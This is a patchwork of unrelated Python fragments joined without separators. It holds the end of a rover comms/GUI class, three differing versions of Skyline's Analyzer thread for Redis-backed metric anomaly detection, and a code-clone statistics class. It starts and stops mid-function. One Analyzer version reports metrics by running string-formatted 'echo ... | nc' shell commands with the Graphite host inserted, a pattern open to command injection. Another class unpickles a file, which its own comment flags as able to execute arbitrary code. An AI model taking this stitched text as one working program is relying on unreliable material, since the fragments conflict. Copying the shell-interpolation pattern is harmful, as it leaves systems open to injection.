        # NOTE(review): the name ``keep`` suggests ``[-keep:]`` (keep the
        # newest entries) may have been intended - confirm with the consumer.
        if keep == 0:
            self.drive_lifo[:] = []
        else:
            self.drive_lifo[:] = self.drive_lifo[:-keep]

    ####################################################
    ## GUI Controls
    ####################################################
    def fetch_rx(self):
        """GUI-facing alias of :meth:`comms_fetch_rx`."""
        return self.comms_fetch_rx()

    def fetch_console_messages(self):
        """Drain the console queue and return its messages as a list."""
        res = []
        while not self.queue_console.empty():
            # Function-call form prints the same text on Python 2 and 3.
            print('something in console')
            res.append(self.queue_console.get())
            self.queue_console.task_done()
        return res

    def fetch_status_updates(self):
        """Placeholder; not implemented."""
        pass

    def is_rover_connected(self):
        """Return True when comms are enabled and no disconnect is flagged."""
        return (self.events['comms_enable'].is_set()
                and not self.events['comms_server_disconnect'].is_set())

    def close(self):
        """Disable comms, flush the queues and close the comms process."""
        self.events['comms_enable'].clear()
        self.comms_flush_rxtx_queues()
        self.comms_close()
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned
    processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        :param parent_pid: pid that :meth:`check_if_parent_is_alive` probes.
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Exit if either this process or the parent process cannot be
        signalled (signal 0 only probes for existence).
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.

        :param name: metric name, appended to the app graphite namespace.
        :param value: already formatted metric value.
        :return: ``True`` if the metric was sent, ``False`` otherwise
            (including when no `GRAPHITE_HOST` is configured).
        """
        if settings.GRAPHITE_HOST == '':
            return False

        skyline_app_metric = skyline_app_graphite_namespace + name
        sock = socket.socket()
        sock.settimeout(10)
        # The socket is closed on every path; previously it leaked whenever
        # connect or sendall failed.
        try:
            # Handle connection error to Graphite #116 @etsy
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
                sock.settimeout(None)
            except socket.error:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

            payload = '%s %s %i\n' % (skyline_app_metric, value, time())
            # sendall needs bytes on Python 3; a Python 2 str already is bytes.
            if not isinstance(payload, bytes):
                payload = payload.encode('utf-8')
            try:
                sock.sendall(payload)
                return True
            except Exception:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False
        finally:
            sock.close()

    @staticmethod
    def _read_float_lines(path):
        """
        Return every line of ``path`` parsed as a float (single quotes
        stripped), or an empty list if the file cannot be read or parsed.
        """
        values = []
        try:
            with open(path, 'r') as f:
                for line in f:
                    values.append(float(line.replace('\n', '').replace("'", '')))
        except Exception:
            return []
        return values

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        The slice of `unique_metrics` belonging to process number `i`
        (1-based) is fetched from Redis with a multi get. For each metric:

        * unpack the `raw_timeseries` for the metric.
        * run :func:`run_selected_algorithm` on the timeseries.
        * if anomalous, append ``[datapoint, base_name]`` to the
          :obj:`self.anomalous_metrics` list and count which algorithms
          triggered.

        The per-process counts are then put on
        :py:obj:`self.anomaly_breakdown_q` and :py:obj:`self.exceptions_q`
        as ``(key, value)`` tuples so the parent process can collate them.
        """
        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor

        # Compile assigned metrics
        assigned_metrics = unique_metrics[assigned_min:assigned_max]

        # Check if this process is unnecessary
        if not assigned_metrics:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists. The loop index has its own
        # name so it no longer shadows the process number ``i``.
        for series_index, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[series_index]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    self.anomalous_metrics.append([datapoint, base_name])

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[settings.ALGORITHMS[index]] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except Exception:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process intializes.

        Loops forever: checks Redis is up, discovers the `unique_metrics`,
        divides them between `ANALYZER_PROCESSES` spin processes, waits for
        them (terminating them after 180 seconds), collates the queued
        results, logs the run details, sends the skyline.analyzer metrics to
        `GRAPHITE_HOST` and sleeps if the run was faster than
        `ANALYZER_OPTIMUM_RUN_DURATION`.
        """
        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)

        # Wait up to 5 seconds for the log lock file to disappear.
        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            # ``0o750`` parses on Python 2.6+ and 3. The former ``0750``
            # literal is a syntax error on Python 3 even behind a version
            # check, because the whole module fails to compile.
            os.makedirs(settings.SKYLINE_TMP_DIR, 0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if not unique_metrics:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable
            # metrics for algorithm run times, etc. Truncate them each run.
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                with open(algorithm_count_file, 'w'):
                    pass
                with open(algorithm_timings_file, 'w'):
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                except Empty:
                    break
                anomaly_breakdown[key] = anomaly_breakdown.get(key, 0) + value

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                except Empty:
                    break
                exceptions[key] = exceptions.get(key, 0) + value

            # Using count files rather that multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                algorithm_count_array = self._read_float_lines(algorithm_count_file)
                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))

                algorithm_timings_array = self._read_float_lines(algorithm_timings_file)
                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                # The array holds only floats at this point, so sum is safe.
                sum_of_algorithm_timings = round(sum(algorithm_timings_array), 6)

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except Exception:
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_metric_name, '%d' % number_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % sum_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                # An empty series has no duration to report.
                if timeseries:
                    # Float division: on Python 2 integer timestamps would
                    # floor any span under an hour to 0.
                    time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600.0
                    logger.info('canary duration :: %.2f' % time_human)
                    self.send_graphite_metric('duration', '%.2f' % time_human)
                    # A single-point series has zero duration; skip the
                    # projection instead of dividing by zero.
                    if time_human > 0:
                        projected = 24 * (time() - now) / time_human
                        self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original slept only if the run took less than 5
            # seconds, which made Analyzer re-analyse a few 1000 metrics
            # again and again within a single minute on smaller deployments.
            # ANALYZER_OPTIMUM_RUN_DURATION lets the sleep self optimise:
            # sleep for whatever is left of the optimum run duration.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
class SharedData(object):
    """
    Handles shared statistical data, which we want to collect over
    several executions of the ccdetection tool.
    Only shared values are used, so that multiple child processes
    can manipulate them.
    """

    KEY_NODES = "nodes_total"
    KEY_INPATH = "in_path"
    KEY_CLONES = "clones"
    KEY_COUNTER = "counter"
    KEY_QUERY_TIME = "query_time_total"
    KEY_FIRST_COUNTER = "first_query_counter"
    KEY_PROJECTS_COUNTER = "projects_counter"
    KEY_FIRST_QUERY_TIME = "first_query_time_total"

    def __init__(self, path, lock, in_path=None):
        """
        Setup all values to be shared (between processes) values.

        If ``path`` is an existing file the state is restored from it and
        ``in_path`` is ignored; otherwise all counters start at zero.

        :param path: file used by loadData() and saveData().
        :param lock: lock guarding saveData() and combineWith(); it must
            support the ``with`` statement.
        :param in_path: input path stored alongside the statistics.
        """
        self.lock = lock
        self.path = path

        if os.path.isfile(path):
            self.loadData()
        else:
            self.in_path = in_path
            self.clones = Manager().list()
            self.counter = Value("i", 0)
            self.nodes_total = Value("i", 0)
            self.first_counter = Value("i", 0)
            self.query_time_total = Value("d", 0)
            self.projects_counter = Value("i", 0)
            self.first_query_time_total = Value("d", 0)

    @staticmethod
    def _average(total, count):
        """
        Return total / count as a float, or 0 when count is zero.
        """
        try:
            return total / float(count)
        except ZeroDivisionError:
            return 0

    def incProjectsCounter(self):
        """
        Increase the counter of projects analysed.
        """
        self.projects_counter.value += 1

    def addQuery(self, query_time, first=False):
        """
        Add the statistical data of a query that did not find a code clone.
        Queries flagged as ``first`` are counted and timed separately.
        """
        if first:
            self.first_counter.value += 1
            self.first_query_time_total.value += query_time
        else:
            self.counter.value += 1
            self.query_time_total.value += query_time

    def addFoundCodeClone(self, code_clone_data, first=False):
        """
        Add the statistical data of a query that did find a code clone.
        """
        self.addQuery(code_clone_data.getQueryTime(), first)
        self.clones.append(code_clone_data)

    def loadData(self):
        """
        Restore all shared values from the pickle file at ``self.path``.
        """
        # SECURITY: pickle.load executes arbitrary code from the file; only
        # point ``path`` at files this tool wrote itself.
        with open(self.path, "rb") as fh:
            data = pickle.load(fh)

        # Restore state from load data.
        self.in_path = data[self.KEY_INPATH]
        self.clones = Manager().list(data[self.KEY_CLONES])
        self.counter = Value("i", data[self.KEY_COUNTER])
        self.nodes_total = Value("i", data[self.KEY_NODES])
        self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER])
        self.query_time_total = Value("d", data[self.KEY_QUERY_TIME])
        self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER])
        self.first_query_time_total = Value(
            "d", data[self.KEY_FIRST_QUERY_TIME])

    def saveData(self, queries, code_clones):
        """
        Save the data of an analysed project to file.
        To avoid conflicts of multiple processes adding and saving data
        at the same time, the whole update and the save run under the lock.

        :param queries: dicts with the keys "query_time" and "first".
        :param code_clones: dicts with the keys "clone" and "first".
        """
        # ``with`` releases the lock even when an update raises; a bare
        # acquire()/release() pair left it held forever on any exception.
        with self.lock:
            # Increase projects counter.
            self.incProjectsCounter()

            # Add all query data.
            for query_dict in queries:
                self.addQuery(query_dict["query_time"], query_dict["first"])

            # Add all data from found code clones
            for clone_dict in code_clones:
                self.addFoundCodeClone(
                    clone_dict["clone"], clone_dict["first"])

            self.saveToFile(self.path)

    def __str__(self):
        """
        Return a multi-line summary; averages over zero queries show as 0.
        """
        queries = self.counter.value
        first_queries = self.first_counter.value
        query_time = self.query_time_total.value
        first_query_time = self.first_query_time_total.value

        avg_query_time_nofirst = self._average(query_time, queries)
        avg_query_time = self._average(
            query_time + first_query_time, queries + first_queries)
        avg_first_query_time = self._average(first_query_time, first_queries)
        avg_nodes = self._average(self.nodes_total.value, queries)

        data = (
            "Projects analysed: %d\n"
            "Total queries executed: %d\n"
            "Average query time: %fs\n"
            "Average query time (without first query): %fs\n"
            "Average query time (first query only): %fs\n"
            "Average number of nodes in AST: %f\n"
            "Code clones found: %d"
        ) % (
            self.projects_counter.value,
            queries + first_queries,
            avg_query_time,
            avg_query_time_nofirst,
            avg_first_query_time,
            avg_nodes,
            len(self.clones)
        )

        return data

    def combineWith(self, shared_data):
        """
        Add the data of ``shared_data`` to this object, under the lock.
        ``in_path`` is overwritten, everything else is accumulated.
        """
        with self.lock:
            self.in_path = shared_data.in_path
            self.nodes_total.value += shared_data.nodes_total.value
            for clone in shared_data.clones:
                self.clones.append(clone)
            self.counter.value += shared_data.counter.value
            self.query_time_total.value += shared_data.query_time_total.value
            self.first_counter.value += shared_data.first_counter.value
            self.projects_counter.value += shared_data.projects_counter.value
            self.first_query_time_total.value += (
                shared_data.first_query_time_total.value
            )

    def saveToFile(self, out_file):
        """
        Pickle all shared values as a plain dictionary into ``out_file``.
        """
        # Transform data to dictionary for easy pickling.
        data = {
            self.KEY_INPATH: self.in_path,
            self.KEY_NODES: self.nodes_total.value,
            self.KEY_CLONES: list(self.clones),
            self.KEY_COUNTER: self.counter.value,
            self.KEY_QUERY_TIME: self.query_time_total.value,
            self.KEY_FIRST_COUNTER: self.first_counter.value,
            self.KEY_PROJECTS_COUNTER: self.projects_counter.value,
            self.KEY_FIRST_QUERY_TIME: self.first_query_time_total.value,
        }

        # Save data to file.
        with open(out_file, "wb") as fh:
            pickle.dump(data, fh, pickle.HIGHEST_PROTOCOL)

    def getClones(self):
        """
        Return the found code clones as a plain list copy.
        """
        return list(self.clones)

    def getProjectsCount(self):
        """
        Return the number of projects analysed.
        """
        return self.projects_counter.value

    def getInPath(self):
        """
        Return the stored input path.
        """
        return self.in_path

    def setInPath(self, path):
        """
        Set the stored input path.
        """
        self.in_path = path
class Analyzer(Thread):
    """
    Thread that repeatedly splits the unique metrics between worker
    processes, collects their results, sends alerts and logs statistics.

    Workers append anomalies to a shared ``Manager().list()`` and report
    their per-process counters through two queues that ``run`` drains after
    the workers have been joined.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        :param parent_pid: pid of the parent process, polled by
            ``check_if_parent_is_alive``
        """
        super(Analyzer, self).__init__()
        self.ring = RedisRing(settings.REDIS_BACKENDS)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        # Shared between the worker processes and this thread.
        self.anomalous_metrics = Manager().list()
        # Workers put (key, count) pairs here; run() sums them up.
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Exit with status 0 when this process or the parent process can no
        longer be signalled.
        """
        try:
            # Signal 0 performs the existence/permission check only.
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    @staticmethod
    def _drain_counts(queue):
        """Sum the (key, value) pairs currently waiting in ``queue`` into a dict."""
        totals = dict()
        while True:
            try:
                key, value = queue.get_nowait()
            except Empty:
                break
            totals[key] = totals.get(key, 0) + value
        return totals

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        :param i: number of this worker (starting at 1); used to build the
            Redis keys of the worker
        :param unique_metrics: list of all metric keys to split between the
            workers
        """
        process_key = '.'.join(['skyline', 'analyzer', socket.gethostname(), str(i)])
        alive_key = '.'.join([process_key, 'alive'])
        self.ring.run('set', alive_key, 1)
        self.ring.run('expire', alive_key, 30)

        # Remove index entries whose key no longer holds a value.
        processes = list(self.ring.run('zrange', settings.ANALYZER_PROCESS_KEY, 0, -1))
        for key in processes:
            value = self.ring.run('get', key)
            if not value:
                # NOTE(review): argument list kept exactly as it was; confirm
                # that the extra 0 is what RedisRing.run expects for zrem.
                self.ring.run('zrem', settings.ANALYZER_PROCESS_KEY, 0, key)

        # Add current process to index and determine position
        if not self.ring.run('zscore', settings.ANALYZER_PROCESS_KEY, alive_key):
            self.ring.run('zadd', settings.ANALYZER_PROCESS_KEY, time(), alive_key)
        self.ring.run('expire', settings.ANALYZER_PROCESS_KEY, 60)
        process_position = self.ring.run('zrank', settings.ANALYZER_PROCESS_KEY, alive_key) + 1
        process_count = self.ring.run('zcard', settings.ANALYZER_PROCESS_KEY)

        # If there are less processes then we know are going to be running
        # assume the others will start
        if process_count < settings.ANALYZER_PROCESSES:
            process_count = settings.ANALYZER_PROCESSES

        # Discover assigned metrics. Positions start at 1 while list indices
        # start at 0, so the slice begins at (position - 1) * size. Clamping
        # the upper bound keeps slices disjoint and inside the list.
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(process_count)))
        assigned_min = (process_position - 1) * keys_per_processor
        assigned_max = min(len(unique_metrics), process_position * keys_per_processor)
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.ring.run('mget', assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)
        # Anomalies found by this process only; written to Redis below.
        anomalous_metrics = []

        # Distill timeseries strings into lists
        for position, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[position]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    anomalous_metrics.append(metric)
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # If anomalies were detected, pack and write the anomaly data to Redis
        if len(anomalous_metrics) > 0:
            packed = Packer().pack(anomalous_metrics)
            self.ring.run('set', process_key, packed)
            # expire the key in 30s so anomalies don't show up for too long
            self.ring.run('expire', process_key, 30)
            self.ring.run('sadd', settings.ANALYZER_ANOMALY_KEY, process_key)
            # expire the key in 60s so anomalies don't show up for too long
            self.ring.run('expire', settings.ANALYZER_ANOMALY_KEY, 60)

        # Hand the process-specific counters to the parent through the queues
        # that run() drains.
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.

        Loops forever: checks the Redis connections, spawns one worker
        process per configured slot, collects their counters, sends alerts,
        logs statistics and resets the shared anomaly list.
        """
        while True:
            now = time()

            # Make sure Redis is up
            try:
                self.ring.check_connections()
            except Exception:
                sleep(10)
                self.ring = RedisRing(settings.REDIS_BACKENDS)
                continue

            # Discover unique metrics
            unique_metrics = list(self.ring.run('smembers', settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queues and populate dictionaries
            anomaly_breakdown = self._drain_counts(self.anomaly_breakdown_q)
            exceptions = self._drain_counts(self.exceptions_q)

            # Send alerts
            if settings.ENABLE_ALERTS:
                # One snapshot instead of a proxy round trip per element.
                anomalies = list(self.anomalous_metrics)
                for alert in settings.ALERTS:
                    for metric in anomalies:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.ring.run('get', cache_key)
                                if not last_alert:
                                    self.ring.run('setex', cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Log progress
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.ring.run('get', settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
class Analyzer(Thread):
    """
    Thread that repeatedly splits the unique metrics between worker
    processes, stores the anomalies they find and queues alerts for them.

    Workers report through manager-backed containers (``exceptions``,
    ``anomaly_breakdown``, ``anomalous_metrics``) that are emptied at the end
    of every cycle.
    """

    def __init__(self, parent_pid, storage):
        """
        Initialize the Analyzer

        :param parent_pid: pid of the parent process, polled by
            ``check_if_parent_is_alive``
        :param storage: object whose ``save(metric)`` is called for new
            anomalies; also handed to ``Alerter``
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()
        self.storage = storage
        self.alerter = Alerter(storage)

    def check_if_parent_is_alive(self):
        """
        Exit with status 0 when this process or the parent process can no
        longer be signalled.
        """
        try:
            # Signal 0 performs the existence/permission check only.
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        :param i: number of this worker, from 1 to settings.ANALYZER_PROCESSES
        :param unique_metrics: list of all metric keys to split between the
            workers
        """
        # Discover assigned metrics. Worker numbers start at 1 while list
        # indices start at 0, so the slice begins at (i - 1) * size. Clamping
        # the upper bound keeps slices disjoint and inside the list.
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        assigned_min = (i - 1) * keys_per_processor
        assigned_max = min(len(unique_metrics), i * keys_per_processor)
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for position, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[position]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
